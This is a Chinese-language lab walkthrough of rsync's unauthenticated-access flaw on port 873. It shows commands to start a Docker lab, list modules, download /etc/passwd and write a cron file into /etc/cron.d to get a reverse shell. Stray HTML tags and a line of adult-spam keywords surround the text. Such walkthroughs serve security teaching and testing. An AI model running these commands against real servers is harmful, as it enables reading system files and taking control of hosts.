<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    rsync 未授權訪問漏洞

    Path rsync/common

    rsync是Linux下一款數據備份工具,支持通過rsync協議、ssh協議進行遠程文件傳輸。其中rsync協議默認監聽873端口,如果目標開啟了rsync服務,并且沒有配置ACL或訪問密碼,我們將可以讀寫目標服務器文件。

    漏洞測試

    編譯及運行rsync服務器:

    docker-compose build
    docker-compose up -d

    環境啟動后,我們用rsync命令訪問之:

    rsync rsync://your-ip:873/

    可以查看模塊名列表:

    如上圖,有一個src模塊,我們再列出這個模塊下的文件:

    rsync rsync://your-ip:873/src/

    這是一個Linux根目錄,我們可以下載任意文件:

    rsync -av rsync://your-ip:873/src/etc/passwd ./

    或者寫入任意文件:

    rsync -av shell rsync://your-ip:873/src/etc/cron.d/shell

    我們寫入了一個cron任務,成功反彈shell:

    本文章首發在 網安wangan.com 網站上。

    上一篇 下一篇
    討論數量: 0
    只看當前版本


    暫無話題~
    亚洲 欧美 自拍 唯美 另类